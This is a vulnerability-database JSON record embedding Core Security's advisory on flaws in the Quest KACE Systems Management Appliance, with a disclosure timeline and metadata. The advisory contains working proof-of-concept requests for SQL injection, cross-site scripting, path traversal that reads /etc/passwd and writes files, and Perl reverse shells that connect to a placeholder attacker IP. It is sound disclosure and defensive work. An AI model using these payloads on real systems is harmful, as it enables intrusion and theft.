161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity amp; access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11135",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-15641",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-11135",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"id": "VAR-201805-0595",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
}
]
},
"last_update_date": "2023-12-18T12:01:57.760000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "QuestKACESystemManagementAppliancePHP object injection vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/137673"
},
{
"title": "Quest KACE System Management Appliance Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=81231"
},
{
"title": "lean0x2f.github.io",
"trust": 0.1,
"url": "https://github.com/lean0x2f/lean0x2f.github.io "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-1321",
"trust": 1.0
},
{
"problemtype": "CWE-94",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "NVD",
"id": "CVE-2018-11135"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/915.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/lean0x2f/lean0x2f.github.io"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.403000",
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-08-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-15641"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11135"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005409"
},
{
"date": "2022-12-02T19:13:11.127000",
"db": "NVD",
"id": "CVE-2018-11135"
},
{
"date": "2022-12-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE Systems Management Appliance Code injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005409"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1219"
}
],
"trust": 0.6
}
}
VAR-201805-0600
Vulnerability from variot - Updated: 2023-12-18 12:01The 'reportID' parameter received by the '/common/run_report.php' script in the Quest KACE System Management Appliance 8.0.318 is not sanitized, leading to SQL injection (in particular, an error-based type). QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
. Quest KACE System Management Appliance 8.0 (Build 8.0.318) Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
Additional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).
7.1. Unauthenticated command injection
[CVE-2018-11138] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform.
The script receives the following parameters via the GET method:
. platform: Indicates the platform in which the agent is going to be installed . serv: SHA256 hash of a fixed value that depends of each appliance . orgid: Organization ID . version: Version number of the agent
The last two conditions are simple to meet. The Agent versions are publicly available within the Quest KACE site, but even if they were not, we found that the Organization ID parameter is vulnerable to a time based SQL injection (refer to issue 7.7). This would make it possible to obtain the agent version by querying the table 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' column. The Organization ID is 1 by default, but could be obtained in the same way as the Agent version by querying the table 'ORGANIZATION' and the column 'ID'.
As stated above, the application uses the Organization ID and Agent version parameters to execute commands. This means we need to find a way to append system commands within the Organization ID, without breaking the SQL query. If we use the comment symbol (#), we can append anything we want without affecting the result of the query.
Preparing payload:
/----- - platform = windows - serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c - orgid = 1#;perl -e 'use Socket;$i="[AttackerIP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'; - version = 8.0.152 (last agent version available for windows) -----/
The following proof of concept executes a reverse shell:
/----- GET /common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b'%3b&version=8.0.152 HTTP/1.1 Host: Server Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 0 -----/
/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.2. Authenticated command injection
[CVE-2018-11139] The '/common/ajax_email_connection_test.php' script used to test the configured SMTP server is accessible by any authenticated user and can be abused to execute arbitrary commands on the system. This script is vulnerable to command injection via the unsanitized user input 'TEST_SERVER' sent to the script via POST method.
The following proof of concept executes a reverse shell:
/----- POST /common/ajax_email_connection_test.php HTTP/1.1 Host: [ServerIP] Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 416 Cookie: [Cookie] Connection: close
TEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d"[AttackerIP]"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">%26S")%3bopen(STDOUT,">%26S")%3bopen(STDERR,">%26S")%3bexec("/bin/sh+-i")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP -----/
